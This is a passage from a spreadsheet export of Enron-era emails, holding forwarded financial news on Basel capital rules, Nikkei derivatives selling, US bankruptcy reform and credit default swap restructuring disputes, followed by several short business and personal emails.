_x000D_
The coming revisions to the Basel Accord, planned for introduction by 2004,_x000D_
aim to update the way that banks globally account for risk._x000D_
_x000D_
The new version of that agreement "will likely incorporate a greater_x000D_
reliance on banks' internal risk rating systems in assessing regulatory_x000D_
minimum capital requirements," the Fed paper said._x000D_
_x000D_
Derivatives Give Extra Nudge to Falling Nikkei._x000D_
Reuters English News Service_x000D_
By Risa Maeda_x000D_
_x000D_
A plunge in the Tokyo stock market partly reflects hedge selling related to_x000D_
equity derivatives products, analysts said on Friday, forecasting more such_x000D_
sales ahead if the benchmark Nikkei average crumbles further._x000D_
_x000D_
Selling related to derivatives products - mainly structured bonds with_x000D_
returns linked to the Nikkei's level - has gathered steam since the Nikkei_x000D_
dipped below 13,000, the analysts said._x000D_
_x000D_
On Friday it stood at 12,261.80 - a 15-year low._x000D_
_x000D_
The so called "Nikkei-linked bonds" have grown especially popular in the_x000D_
last two years as cash-rich individual investors hunger for returns beyond_x000D_
current rock-bottom interest rates offered by conventional government debt._x000D_
_x000D_
Financial Services Minister Hakuo Yanagisawa said on Friday that the recent_x000D_
sharp drop in share prices was due in part to trading in equity derivatives_x000D_
products._x000D_
_x000D_
"Equity derivatives products have been accelerating the decline (in Japan's_x000D_
stock market)," Yanagisawa said._x000D_
_x000D_
Nobuaki Kurisu, chief fund manager at Sumisei Global Investment Trust_x000D_
Management, also cited derivatives -related selling as a factor in the stock_x000D_
market's plunge, and added that such selling should keep market volatility_x000D_
high for the time being, making institutional investors hesitant to buy._x000D_
_x000D_
Analysts said speculators have been selling Nikkei futures contracts in the_x000D_
past weeks, trying to nudge the Nikkei average to pre-determined levels that_x000D_
will in turn trigger hedge-related selling. Many of the trigger points were_x000D_
believed to be set at or below 12,600._x000D_
_x000D_
THE RUSH TO HEDGE_x000D_
_x000D_
Equity linked derivative bonds, which usually mature in six months to one_x000D_
year, offer higher interest rates than ordinary bonds if the Nikkei stays_x000D_
above a pre-determined level._x000D_
_x000D_
But once the Nikkei drops below that level, the return at the bond's_x000D_
maturity will be lower than the initial investment. This causes brokers to_x000D_
hedge by lightening existing long positions or selling in the market._x000D_
_x000D_
"Arrangers of these products have to sell either Nikkei futures or a basket_x000D_
of Nikkei 225 component stocks to hedge, and there are more trigger points_x000D_
if the average dips to 12,000 and further to 11,500," said Hirokazu Kabeya,_x000D_
analyst at Daiwa Institute of Research._x000D_
_x000D_
He said up to 100 billion yen ($852.2 million) worth of these bonds have_x000D_
been launched at each of three different pre-set Nikkei levels - between_x000D_
13,000 and 12,500, between 12,500 and 12,000 and between 12,000 and 11,500._x000D_
_x000D_
Another equity derivatives product which has attracted retail investors over_x000D_
the past two years has been exchangeable bonds (EBs), often linked with the_x000D_
stock prices of blue-chip high-tech issues such as Sony Corp and Nippon_x000D_
Telegraph and Telephone Corp (NTT)_x000D_
_x000D_
EBs are automatically redeemed if the value of a selected stock rises above_x000D_
a pre-determined price._x000D_
_x000D_
If the value falls below the pre-determined price, as has often been the_x000D_
case recently, the EBs are redeemed with stock certificates carrying latent_x000D_
losses, causing many investors to unload the unwanted certificates in an_x000D_
already bearish market. ($1=117.33 Yen)._x000D_
_x000D_
_x000D_
House Passes Bankruptcy Reform_x000D_
BNA - March 2, 2001_x000D_
By Adam Walsh_x000D_
_x000D_
Three years in the making, sweeping bankruptcy reform legislation (H.R. 333)_x000D_
passed the House 306-108 March 1, sending waves of contentment through much_x000D_
of the financial services sector and the ranks of Republicans, none of whom_x000D_
voted to oppose the measure._x000D_
_x000D_
In the end, 93 Democrats crossed party lines to support the bill, which has_x000D_
moved through the House before only to be pocket vetoed by former President_x000D_
Clinton last year. The majority of Democrats opposed the measure, deploring_x000D_
it for its treatment of lower- and middle-income Americans who depend upon_x000D_
bankruptcy to achieve a "fresh start."_x000D_
_x000D_
A Democratic replacement amendment, which Rep. F. James Sensenbrenner Jr._x000D_
(R-Wis.) said would "eviscerate" the present bill, was defeated 256-162._x000D_
Also, the House moved to defeat a motion by Rep. John Conyers (D-Mich.), the_x000D_
ranking member of the House Judiciary Committee, to recommit the bill back_x000D_
to committee. Conyers proposed a measure limiting the marketing of credit_x000D_
cards to those who are under 21._x000D_
_x000D_
"This bill seeks to restore personal responsibility and integrity to the_x000D_
bankruptcy system and ensure these laws are fair to both debtor and_x000D_
creditors," Sensenbrenner said following the bill's passage. "Abuse of the_x000D_
current system--estimated to cost the rest of us approximately $4 billion_x000D_
each year--is the driving force behind this bipartisan, balanced, and_x000D_
comprehensive legislation."_x000D_
_x000D_
In a statement, Edward L. Yingling, executive director of the American_x000D_
Bankers Association, said ABA "is very pleased to see bankruptcy reform pass_x000D_
the House today by such a broad bipartisan margin." Saying the current_x000D_
bankruptcy code permits individuals with higher incomes to walk away from_x000D_
debts, he called bankruptcy reform "an urgent matter because the system is_x000D_
broken and needs to be fixed."_x000D_
_x000D_
In general, H.R. 333 and S. 220, its companion bill in the Senate, seek to_x000D_
force more bankruptcy filers to file under Chapter 13, which requires some_x000D_
repayment of debts, instead of Chapter 7, which discharges most debts._x000D_
_x000D_
_x000D_
Means Test Main Feature of Measure_x000D_
_x000D_
Before moving off the House floor, three substantive amendments were made to_x000D_
H.R. 333, in addition to one technical amendment. The first, which passed by_x000D_
voice vote and was offered by Rep. Sheila Jackson-Lee (D-Texas), adds a_x000D_
debtor's monthly public school expenses as an allowable expense under the_x000D_
bill's means test and puts public school expenses on an equal footing with_x000D_
that of private school expenses, which is already included in the bill. The_x000D_
means test is the reform measure's primary feature. It is designed to serve_x000D_
as a kind of calculation device to determine who can file under Chapter 13_x000D_
and who can file under Chapter 7._x000D_
A second and third amendment also passed by voice vote. Offered by Rep. Mark_x000D_
Green (R-Wis.), the second amendment would remove the names of children from_x000D_
bankruptcy filings in order to shield minors from would-be predators. The_x000D_
final substantive amendment offered jointly by Financial Services Committee_x000D_
Chairman Michael Oxley (R-Ohio) and the committee's ranking member, Rep._x000D_
John J. LaFalce (D-N.Y.) aims to reduce uncertainty and limit systemic risk_x000D_
in the banking system by simplifying the terms for settling large financial_x000D_
contracts in the event that one counter-party becomes insolvent._x000D_
_x000D_
Former House Banking Committee Chairman James A. Leach (R-Iowa) rose to_x000D_
support the bill, citing this sole amendment as reason enough to do so. A_x000D_
similar amendment was made to the legislation during markup in the Senate_x000D_
Judiciary Committee Feb. 28. Both amendments conform legal definitions_x000D_
throughout the body of law that cover the bankruptcy of large financial_x000D_
institutions._x000D_
_x000D_
House Majority Leader Dick Armey (R-Texas) rose to support the bill saying_x000D_
it was a "matter of enormous pride" that the House adopt bankruptcy reform_x000D_
legislation._x000D_
_x000D_
Rep. Mel Watt (D-N.C.) took a different view, alleging that the bill was the_x000D_
result of special interests. "At the end of the day, this bill will not be_x000D_
amended because it is a political statement," Watt said on the floor._x000D_
"People who wanted this bill knew that they could not get it unless they_x000D_
exempted the poorest people from the system." Watt referred to a portion of_x000D_
the bill's means test that exempts wage earners who make less than half of_x000D_
their state's median income. The establishment of two classes of_x000D_
debtors--one poorer and one richer--would be the "lasting legacy" of this_x000D_
bill, Watt said._x000D_
_x000D_
Rep. Jerrold Nadler (D-N.Y.) called the bill a "poster child" for campaign_x000D_
reform legislation. Commenting on the House rule that limited debate on H.R._x000D_
333, Rep. Adam Schiff (D-Calif.) said the House was delegating its_x000D_
legislative responsibilities to the Senate._x000D_
_x000D_
The bill now must wait until the Senate passes its version before a_x000D_
conference can be appointed to work out differences between the two bills_x000D_
(see related report in this section)._x000D_
_x000D_
_x000D_
What's a default?_x000D_
Derivatives Strategy - February 2001_x000D_
By Barclay T. Leib_x000D_
_x000D_
Credit derivatives only came into existence in the latter half of the 199_x000D_
Os, and the documentation behind the product has been lightly tested. But on_x000D_
September 22 last fall, some credit derivatives traders got a rude wake-up_x000D_
call. That was the day Bank of America and Chase announced the extension of_x000D_
$2.8 billion in loans to the troubled Conseco Corp. While this helped_x000D_
Conseco avoid an immediate bankruptcy declaration and sent the company's_x000D_
bonds modestly higher, the loan extension was technically deemed a_x000D_
restructuring. As such, it was also deemed a credit event-which allowed some_x000D_
fast-footed dealers to deliver long-dated Conseco securities against credit_x000D_
default swap agreements. Bonds that had previously been trading at a 60_x000D_
handle could suddenly be tendered at par._x000D_
_x000D_
Since credit default events had been rare to that point- Rite Aid, Armstrong_x000D_
Corp. and school-bus manufacturer Laidlaw being the only three high-profile_x000D_
examples-several banks were caught completely off-guard by the Conseco_x000D_
situation. "I think there was a gentleman's perception that this loan_x000D_
restructuring should not have caused a default trigger, even though the_x000D_
nitty-gritty of the [International Swaps and Derivatives Association]_x000D_
document clearly allowed it to be such," notes a credit derivatives broker._x000D_
"Even fewer dealers thought it was an appropriate response to get delivered_x000D_
longer-dated paper when it was a short-term loan that got extended."_x000D_
_x000D_
Ever since, the usefulness of credit default swaps has been called into_x000D_
question, and the market has been abuzz with proposed language changes to_x000D_
the ISDA derivatives document. For all the deal flow these days, it's_x000D_
suddenly become apparent that many people aren't entirely sure what it is_x000D_
they've been trading: Is this a product that is supposed to pay off on_x000D_
credit impairment, or is it a product intended to protect capital in case of_x000D_
a cataclysmic inability to recover ones principal? Most people believe it_x000D_
should be the latter, but the Conseco event suddenly raised disparate_x000D_
interests and views that previously had been shoved under the rug._x000D_
_x000D_
Tailor-made contracts with specific restructuring provisions-either included_x000D_
or not-can always be designed and traded, but suddenly no one knows what the_x000D_
standard documentation for the interdealer market should be-and that has_x000D_
regulators and industry groups scrambling for answers. In a research report_x000D_
called "Restructuring: A Defining Event for Synthetic CDOs," dated December_x000D_
22, the rating agency Fitch even stated that recent developments may_x000D_
eventually necessitate changes in its rating criteria for credit derivatives_x000D_
and the collateralized debt obligations into which they are sometimes_x000D_
packaged. According to Roger Merritt, managing director in Fitch's global_x000D_
loan products group, "a narrower definition as to what constitutes a credit_x000D_
event, or the complete elimination of restructuring, should, in fact,_x000D_
correspond with a lower incidence of credit protection payments for_x000D_
synthetic CDOs and credit derivatives._x000D_
_x000D_
Important insurance_x000D_
Credit default swaps stipulate that in one of several possible events-the_x000D_
declaration of a bankruptcy; the failure to pay interest on a loan or bond,_x000D_
or the restructuring, repudiation or acceleration of a loan that lowers the_x000D_
overall creditworthiness of a counterparty-the buyer of the swap may deliver_x000D_
to the seller any loan or bond extending out to a predefined maturity, and_x000D_
receive back par value in return. In a market where it can be difficult and_x000D_
time-intensive for bank portfolio managers to resell an actual loan, this is_x000D_
an important and attractive product for lenders. Although delivery is_x000D_
typically based on physical settlement of loans or bonds at their par value,_x000D_
contracts are sometimes written for cash settlement of par value minus any_x000D_
recovery from the sale of the asset._x000D_
_x000D_
Because of the product, loan portfolio managers on both sides of the_x000D_
Atlantic have morphed in recent years into active traders, while insurance_x000D_
company and hedge fund managers gained a new way to position themselves._x000D_
_x000D_
Within the credit default swap contract, restructuring is clearly a trigger_x000D_
event important to many commercial banks. "There are increasing pressures on_x000D_
banks to mark loans to market, and when a loan is restructured, it is_x000D_
clearly a loss of value-often a step taken just to avoid an immediate_x000D_
default," explains Hetty Harlan, a managing director in charge of credit_x000D_
derivatives trading for BofA's portfolio management group. Harlan thus_x000D_
considers structurings "de facto" or "prepackaged" defaults and a legitimate_x000D_
credit event under standard ISDA document._x000D_
_x000D_
"Such loans become expensive to hang onto in terms of loan loss reserves or_x000D_
charge-offs," she explains, "so we need to have some relief at that point to_x000D_
help mitigate the risk of doing so. Nobody wants to throw a company into_x000D_
bankruptcy if there's a glimmer of hope that a company may turn around with_x000D_
time. Banks shouldn't be in a position where they have to push for default_x000D_
because restructuring does not qualify for relief. That is in nobody's best_x000D_
interest."_x000D_
_x000D_
Not everyone in the credit market thinks this issue is quite that simple and_x000D_
straightforward, however. According to sources close to the Conseco_x000D_
situation, Bank of America was actually the first institution to start_x000D_
delivering Conseco paper against long credit default swaps it had previously_x000D_
purchased. Harlan claims the bank only delivered the restructured loans, but_x000D_
other sources say BofA delivered the cheapest bonds it could get its hands_x000D_
on. Merrill Lynch quickly followed. But since Bank of America also had a_x000D_
hand in the loan extension, some cried foul at the potential conflict of_x000D_
interest._x000D_
_x000D_
"Since the loan was renegotiated on the last day of the contract, BofA_x000D_
certainly could have considered it a repaid loan, and then extended a new_x000D_
loan if it had wanted to couch it in such terms," says one dealer. "That_x000D_
path would have avoided the technical default. In lieu of that, however,_x000D_
Bank of America termed the extension a restructuring, and quickly delivered_x000D_
Conseco paper to get it off its books."_x000D_
_x000D_
"At the end of the day, calling the Conseco loan a restructuring was_x000D_
probably the commercially normal thing for BofA to have done," ventures_x000D_
another senior dealer. "It knew the implications of its actions, and_x000D_
coincidentally was happy to benefit. This is a financial market, not a_x000D_
social club. You have to have compelling big-picture incentives for people_x000D_
not to do short-term things in their economic best interest."_x000D_
_x000D_
Nonetheless, these events highlight a moral hazard issue, and more than a_x000D_
few fund and insurance sellers of credit derivatives protection felt burned._x000D_
After all, how can a bank extend a loan, collect big fees for doing so, then_x000D_
come crying to the market that they need added compensation under their_x000D_
credit default swaps? Many think there's something fundamentally wrong here._x000D_
Moreover, they argue, if Bank of America had been short credit default swaps_x000D_
instead of long, might it have potentially followed a different path that_x000D_
would have once again benefited its own book but potentially left those_x000D_
actually betting on a Conseco default with less satisfaction?_x000D_
_x000D_
Slow down, don't move too fast_x000D_
A s a result of this debate, many U.S.-based dealers last MOctober_x000D_
petitioned for the complete removal of restructuring as a trigger event in_x000D_
credit derivatives documentation. Not long after, these dealers started_x000D_
quoting standard credit derivative contracts with the restructuring language_x000D_
removed. The broker market became a two-tier market of credit default swaps_x000D_
"with restructuring" and "without restructuring."_x000D_
_x000D_
But many again cried foul. "I was very taken aback," says BofNs Harlan, "A_x000D_
credit default swap without a trigger for restructuring is a much less_x000D_
valuable instrument to us. By proposing such a change, dealers were just_x000D_
trying to simplify and provide a quick fix to the problem issue. But this_x000D_
quick fix would truly eat away at the contract's very usefulness to many_x000D_
buyers-particularly banks." Since then, Harlan has continued to insist that_x000D_
restructuring be included in all new contracts she enters into._x000D_
_x000D_
European credit derivative participants also balked at the new direction_x000D_
decided upon by their American counterparts. The European capital markets_x000D_
contain a much higher percentage of bank loans vs. bond debt, and few_x000D_
bankers want to lose the protection of a loan restructuring clause as a_x000D_
trigger for credit default swaps. After all, isn't a loan restructuring just_x000D_
one step removed from outright bankruptcy? And if people don't recognize it_x000D_
as such, what's the point of buying credit protection in the first place?_x000D_
_x000D_
The result to date of this Continental drift: all credit derivatives_x000D_
transacted between U.S. and European counter-parties continue to include_x000D_
restructuring in the documentation. But many contracts negotiated solely_x000D_
between U.S. counterparties do not. The credit derivatives market has_x000D_
effectively bifurcated itself into two distinctly different products, and_x000D_
although it hasn't yet reached a critical stage, participants are concerned_x000D_
that this bifurcation may start to hurt overall market liquidity._x000D_
_x000D_
Regulator warnings_x000D_
If the rancor from European bankers was not already loud I enough, the_x000D_
global regulatory community also posted a strong stop sign in front of the_x000D_
"without restructuring" contracts. At the Chase-Derivatives Strategy Credit_x000D_
Derivatives Conference in mid-November, Federal Reserve Board official_x000D_
Thomas Boemio threw down the proverbial gauntlet. "If restructuring is taken_x000D_
out of ISDA documentation," he said, "the Fed will ignore credit derivatives_x000D_
for purposes of capital relief." There were loud oohs and aahs from the_x000D_
bankers and dealers in the audience at Boemio's pronouncement. After all,_x000D_
credit derivatives were born very much to help banks satisfy Fed-mandated_x000D_
regulatory capital requirements. Take that regulatory relief away, and core_x000D_
demand for the product would certainly be reduced._x000D_
_x000D_
Since that conference, dealers have met many more times to try to hash_x000D_
things out. ISDA executive director and CEO Bob Pickel traveled to London in_x000D_
early December to try to smooth the ruffled feathers of European bankers. At_x000D_
the first of those meetings, held in the stately Fleet Street offices of_x000D_
Goldman Sachs, several European bankers explained that French regulatory_x000D_
officials had joined the Fed's Boemio in reiterating that credit derivatives_x000D_
documentation needs to retain loan restructuring default clauses in order to_x000D_
be deemed "good offset" to a loan or bond position. Such news caused further_x000D_
groans from dealing participants across the Atlantic._x000D_
"I don't think the Fed or the Commission Banquaire [the French regulator]_x000D_
have truly thought out their position on this," says one senior credit_x000D_
derivatives dealer at a major New York investment bank. "Since all bank_x000D_
loans can only be restructured with the 100-percent approval of those_x000D_
holding these loans, where's the harm in allowing capital relief at least_x000D_
until such a restructuring transpires?" In other words, if a bank has a_x000D_
two-year loan covered by a two-year credit default swap, that bank would_x000D_
naturally agree to a loan extension only on terms attractive to it. If not_x000D_
offered such terms, it would simply demand repayment of the loan, even if_x000D_
such demands forced the company into bankruptcy._x000D_
_x000D_
For its part, the Fed seems to have larger issues of fairness and security_x000D_
in mind. It doesn't want banks to appear to have capital protection after_x000D_
buying credit default swaps, only to be forced to effectively abandon such_x000D_
protection by a corporate counterpart playing hardball in a loan_x000D_
renegotiation process. For example, would a bank give up its collection_x000D_
rights on a $20 million credit default swap if it had $1 billion in total_x000D_
loans that could be thrown into the nonperforming category by a bankruptcy_x000D_
declaration? Without a hard and fast rule that a loan restructuring is a_x000D_
credit event, it might feel obliged to do so._x000D_
_x000D_
A pendulum_x000D_
Over its short history, credit derivatives documentation has swung from_x000D_
being overly vague to potentially too specific. ISDA's initial credit_x000D_
derivative definitions, drafted in 1995 as an addendum to the ISDA master_x000D_
derivatives document, stipulated that in order to trigger a credit event,_x000D_
the change in the terms of any loan or bond obligation had to result in_x000D_
terms that were "materially less favorable to any holders of the_x000D_
obligation." Many deemed this language too vague and subjective; it tended_x000D_
to encourage litigation rather than avoid it._x000D_
_x000D_
After the 1998 turmoil surrounding Russian paper- which many viewed as a_x000D_
default, but some called a period of acute market stress-there was general_x000D_
agreement in 1999 to try to tighten up the documentation language. Very_x000D_
specific definitions of a credit event were introduced. Even then, some_x000D_
participants were not fully confident of the new verbiage, but after much_x000D_
discussion, exhaustion ruled. "People grew so sick of the debate on_x000D_
restructuring that in the end, it was just easiest to go with the new_x000D_
definitions and come back to the issue at a later date," says Richard_x000D_
Kennaugh, co-head of credit derivatives trading at Chase Securities. "At the_x000D_
time, the 1999 definitions were thought to at least be better than what was_x000D_
used before."_x000D_
_x000D_
The 1999 definitions lasted all of 18 months before hitting their first_x000D_
stumbling block. Now, participants complain that the definition of a credit_x000D_
default actually became far too precise back in 1999. The Conseco situation_x000D_
showed how a technical default could trigger a credit derivatives exercise,_x000D_
but without the debt of the underlying company being truly hurt. At the_x000D_
center of the snafu is the presumption that, when a bank loan is_x000D_
restructured, all other corporate debt becomes harmed and thus due and_x000D_
payable. Events have clearly proven otherwise: not only has Conseco not_x000D_
fallen into bankruptcy, but its various tranches of debt and bonds continue_x000D_
to trade at markedly different valuations in the market._x000D_
_x000D_
"Almost every major institution wants some change to the restructuring_x000D_
language now," says Kennaugh. "The status quo is not an acceptable option._x000D_
We have to establish a better standard for interdealer business, or risk_x000D_
less liquidity and a great deal of added basis risk within dealer books."_x000D_
Although achieving consensus will not be easy, Kennaugh's hope is that some_x000D_
standard acceptable to investors, hedgers and dealers alike can be_x000D_
established. Then anything different from that standard will continue to be_x000D_
available in the market at a premium or discounted price depending upon the_x000D_
specific language used._x000D_
_x000D_
The million-dollar question_x000D_
So what should ISDA do to set the credit derivatives market back on course?_x000D_
_x000D_
There are two basic paths-with numerous permutations buried within-the trade_x000D_
group could take. First, it could try to narrow the definition of_x000D_
restructuring and limit the deliverability under a restructuring to the_x000D_
actual loans or bonds in question, or to paper with a shorter tenor than the_x000D_
restructuring period. The language to accomplish this might require some_x000D_
tricky drafting, but the goal would be to give sellers of credit derivatives_x000D_
more solace that they could not be blindsided on a loan restructuring with_x000D_
the delivery of longer-dated paper, while the buyers of credit default swaps_x000D_
would still maintain the regulatory ability to tender restructured paper._x000D_
_x000D_
This compromise, however, could create a "two-step delivery option." On the_x000D_
occasion of a loan restructuring, the holder of a credit default swap might_x000D_
be able to either tender the actual loan affected or a similar short-term_x000D_
piece of debt, or hold onto the credit derivative for the possibility of an_x000D_
actual bankruptcy event at a later date. If bankruptcy eventually_x000D_
transpired, then any paper out to a predefined maturity would be renderable._x000D_
In other words, there could be one central contract, but with a new delivery_x000D_
twist within it._x000D_
_x000D_
"That might be a possible outcome," says BofA's Harlan. "But banks are so_x000D_
conservative, I think almost everyone would exercise the credit derivative_x000D_
on the first go-round. The pressure just to get troubled debt off one's_x000D_
books would dominate the potential reward of gleaning even greater value_x000D_
from the default swap later on."_x000D_
_x000D_
Others aren't so sure this solution would work. "It might introduce too much_x000D_
uncertainty into the delivery process. People want to know what they are_x000D_
going to get, and when," says Hilmar Schaumann, head of credit derivatives_x000D_
trading for Swiss Re New Markets in New York_x000D_
At the moment, credit default swaps can be triggered by either the buyer or_x000D_
seller of the swap, in order not to leave the seller hanging with a_x000D_
contingent liability. If a narrowed restructuring delivery option is_x000D_
introduced, it is likely that only the buyer of the default swap would have_x000D_
the power to decide whether to deliver a specific restructured loan._x000D_
_x000D_
Some also argue that, to be completely fair, the party long the credit_x000D_
default swap and tendering the loan should be forced to hand over any added_x000D_
fees collected from the restructuring. This is not currently standard_x000D_
practice._x000D_
_x000D_
The inclusion of a "materiality clause" is another possible permutation of_x000D_
the restructuring language being bandied about. Such a clause could_x000D_
stipulate that a restructuring only be considered a default event if the_x000D_
credit rating of the underlying corporate entity subsequently deteriorates_x000D_
beyond a stated level. Given the large range of potential underlying_x000D_
credits, however, the specific drafting required here might be even more_x000D_
difficult for participants to agree on in advance._x000D_
_x000D_
The other major alternative would be to continue allowing the two_x000D_
contracts-one with restructuring and the other without-to simply develop of_x000D_
their own accord, with Darwinian forces of supply and demand deciding which_x000D_
is more useful and popular as a core product._x000D_
_x000D_
Restructuring would just become another check-box among many on the ISDA_x000D_
document that people could either use or ignore. Such an approach might_x000D_
result in more documentation mismatches and basis risk on dealer books, but_x000D_
it might also keep diverse end-user participants more satisfied._x000D_
_x000D_
"ISDA cannot unilaterally tell the market what it should use," says Jeremy_x000D_
Barnum, head credit derivatives trader at J.P. Morgan. "People will trade_x000D_
what contracts they want to trade, and we may have to wait to see which_x000D_
contract that will be. There is a perception that without regulatory capital_x000D_
relief, the market just dies, but that is patently wrong. Banks are_x000D_
increasingly a small percentage of the market. If banks still want relief_x000D_
with restructuring included, that price exists today and will continue to_x000D_
exist. It just may not be the standard contract anymore._x000D_
_x000D_
It is possible, of course, that the market will end up with a refined_x000D_
restructuring definition and a check-box approach to whether restructuring_x000D_
is included in a deal or not. Barnum, for one, thinks it is unrealistic to_x000D_
expect a single contract that unifies bank loan people and bond_x000D_
investors-two groups with fundamentally different needs and desires. "But_x000D_
ISDA had the foresight to structure its document in a menu framework where_x000D_
you can check off prepackaged definitions," he says, "so we're likely just_x000D_
headed to another check-box solution, maybe with some improved definitions_x000D_
within."_x000D_
_x000D_
Whatever ISDA decides, it must do so quickly, before other credit derivative_x000D_
problems pop up. A year ago, for example, Xerox credit default swaps were_x000D_
trading at just 30 basis points per annum. Now they are 1,000 basis points_x000D_
bid, with no offer. Overall Xerox has $17 billion in out standing debt and_x000D_
is quickly approaching full usage of its bank lines of credit. Separately,_x000D_
many of its interest rate and equity swap agreements have embedded credit_x000D_
clauses that  will force it to liquidate these contracts should it be_x000D_
downgraded below a certain credit rating</t>
  </si>
  <si>
    <t>Mon, 8 May 2000 04:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: Picture 3 of 3</t>
  </si>
  <si>
    <t>Return-Path: &lt;jantom65@yahoo.com&gt;_x000D_
Received: from  rly-yg02.mx.aol.com (rly-yg02.mail.aol.com [172.18.147.2]) by _x000D_
air-yg03.mail.aol.com (v72.8) with ESMTP; Sun, 07 May 2000 15:33:16 -0400_x000D_
Received: from  web311.mail.yahoo.com (web311.mail.yahoo.com _x000D_
[216.115.105.76]) by rly-yg02.mx.aol.com (v71.10) with ESMTP; Sun, 07 May _x000D_
2000 15:31:55 -0400_x000D_
Message-ID: &lt;20000507193154.3616.qmail@web311.mail.yahoo.com&gt;_x000D_
Received: from [209.66.6.46] by web311.mail.yahoo.com; Sun, 07 May 2000 _x000D_
12:31:54 PDT_x000D_
Date: Sun, 7 May 2000 12:31:54 -0700 (PDT)_x000D_
From: Thomas Ruscitti &lt;jantom65@yahoo.com&gt;_x000D_
Subject: Picture 3 of 3_x000D_
To: Kevin David Ruscitti &lt;KRuscitti@aol.com&gt;_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="0-304089172-957727914=:27573"_x000D_
X-Mailer: Unknown_x000D_
_x000D_
_x000D_
Here is the last group of pictures. Looks just like_x000D_
me._x000D_
_x000D_
                   Love Dad_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Send instant messages &amp; get email alerts with Yahoo! Messenger._x000D_
http://im.yahoo.com/_x000D_
_x000D_
 - Picture3.zip</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 11:31:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robtaylor@akllp.com'})</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'lisa.bills@enron.com', 'mgocker@enron.com', 'sheila.tweed@enron.com', 'mmckay@velaw.com', 'sarah.wesner@enron.com', 'roseann.engeldorf@enron.com', 'catherine.clark@enron.com'})</t>
  </si>
  <si>
    <t>DevCo Equipment Purchases</t>
  </si>
  <si>
    <t>In connection with the finalization of the Assignment Documentation for_x000D_
transferring equipment to DevCo, please see the attached.  Please note_x000D_
that I have not received copies of the "Fountain Valley" contracts_x000D_
referenced in the attached chart._x000D_
_x000D_
Regards,_x000D_
_x000D_
Rob Taylor_x000D_
Andrews &amp; Kurth L.L.P._x000D_
600 Travis Street_x000D_
Suite 4200_x000D_
Houston, Texas  77002_x000D_
_x000D_
Tel: (713) 220-4436_x000D_
Fax: (713) 238-7273_x000D_
e-mail: robtaylor@andrews-kurth.com_x000D_
_x000D_
This e-mail is privileged and confidential and is intended only for the_x000D_
recipient(s) named above.  If you are not the intended recipient, please_x000D_
(i) do not read, copy, use or disclose the contents hereof to others_x000D_
(any of the foregoing being strictly prohibited), (ii) notify the sender_x000D_
immediately of your receipt hereof, and (iii) delete this e-mail and all_x000D_
copies of it._x000D_
_x000D_
 &lt;&lt;DevCo Equipment Purchase Agreement Chart.DOC&gt;&gt; _x000D_
 - DevCo Equipment Purchase Agreement Chart.DOC</t>
  </si>
  <si>
    <t>Wed, 7 Feb 2001 05:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sally.beck@enron.com', 'david.forster@enron.com', 'amita.gosalia@enron.com'})</t>
  </si>
  <si>
    <t>Dynegydirect System Update</t>
  </si>
  <si>
    <t xml:space="preserve">Well, looks like we are not the only ones that have problems every now and _x000D_
then!!!  I received a similar message this morning stating that the site was _x000D_
down._x000D_
_x000D_
Sheri_x000D_
---------------------- Forwarded by Sheri Thomas/HOU/ECT on 02/07/2001 01:30 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Customer.Care@dynegy.com on 02/07/2001 01:29:56 PM_x000D_
To: _x000D_
cc:  _x000D_
Subject: Dynegydirect System Update_x000D_
_x000D_
_x000D_
(Embedded image moved to file: pic19718.gif)_x000D_
Dear Dynegydirect User,_x000D_
_x000D_
As of 2:00PM CT today, February, 7, 2001, the Dynegydirect application will_x000D_
be unavailable.  Trading will resume tomorrow, February 8, 2001, during_x000D_
regularly scheduled hours._x000D_
If you have any questions or concerns, please do not hesitate to contact an_x000D_
e-Care analyst at the number listed below.   We apologize for any_x000D_
inconvenience this may have caused._x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
DYNEGYdirect e- care_x000D_
Customer Support_x000D_
Dynegy, Inc._x000D_
Ph: (877) 396.3493   Fx: (877) 396.3492_x000D_
Email: ecare@dynegydirect.com_x000D_
 - pic19718.gif_x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 12:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mitch.taylor@enron.com', 'butts.enron.ene.bob@enron.com'})</t>
  </si>
  <si>
    <t>PGE / Sierra Transaction Costs</t>
  </si>
  <si>
    <t>As a result of the termination of the Sierra transaction we are taking steps_x000D_
to write off our capitalized investment costs associated with software systems_x000D_
(Peoplesoft) that we incurred to integrate PGE with Sierra Pacific. _x000D_
Specifically we spent $2.7 million on a material management system to allows_x000D_
us to move from Enron's SAP system to Peoplesoft and  $.4 million on  systems_x000D_
for migration of our HR system to Peoplesoft.  (total $3.1 million)_x000D_
_x000D_
Here is what I would like to propose and would like to get your concurrence_x000D_
and support for this plan._x000D_
_x000D_
We previously informed Bob and Mark Lindsey that we want to reestablish_x000D_
Enron's overhead charges to PGE.  Kirk Stevens from PGE is working on this_x000D_
project to make it happen.  These charges did not occur in the first quarter_x000D_
and we believe we should pay for those costs for regulatory reasons (currently_x000D_
part of our approved revenue requirements).  What I would recommend is that_x000D_
you bill us for the total 1st quarter overhead allocations in April and at the_x000D_
same time Enron would  provide us a credit for the cumulative incurred charges_x000D_
of $3.1 million.  The net effect of this would be a small catch up payment by_x000D_
PGE for the overhead allocations as well as the ongoing payments for April_x000D_
overheads.  This would get our books back on a consistent basis and would have_x000D_
a minimal impact on PGE and Enron's IBIT and net income.  This is because_x000D_
Enron did not assume any allocations to PGE during the first quarter._x000D_
_x000D_
If you find this to be a workable proposal let me know and I will have Kirk_x000D_
Stevens work with Mark and Bob to implement the charges to the appropriate_x000D_
accounts.  This will clean up our books on anything remaining from the Sierra_x000D_
transaction._x000D_
_x000D_
Thanks for your attention to this matter.  (we have been having some e-mail_x000D_
address problems please let me know that your received this e-mail.  thanks)</t>
  </si>
  <si>
    <t>Mon, 31 Dec 2001 08:36:17 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nhassman@energy.state.ca.us'})</t>
  </si>
  <si>
    <t>[NEWSRELEASES-LIST] Tracy Peaker Project Staff Assessment Released</t>
  </si>
